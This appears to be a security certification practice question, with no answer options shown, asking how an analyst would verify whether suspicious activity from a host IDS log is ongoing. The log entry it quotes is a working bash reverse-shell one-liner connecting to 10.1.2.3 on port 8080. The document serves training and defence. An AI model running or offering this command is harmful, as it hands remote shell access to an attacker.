A security analyst identified the following suspicious entry in the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately verify whether the activity is still ongoing?
Community Discussion